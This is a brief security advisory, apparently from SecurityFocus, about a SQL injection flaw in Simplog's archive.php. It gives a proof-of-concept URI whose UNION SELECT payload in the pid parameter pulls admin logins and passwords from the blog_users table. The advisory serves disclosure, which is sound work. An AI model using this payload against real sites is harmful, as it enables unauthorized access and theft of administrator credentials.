Simplog Archive.PHP SQL Injection Vulnerability

Attackers can exploit these issues via a web client.

The following proof-of-concept URI is available:

http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1


 

Privacy Statement
Copyright 2010, SecurityFocus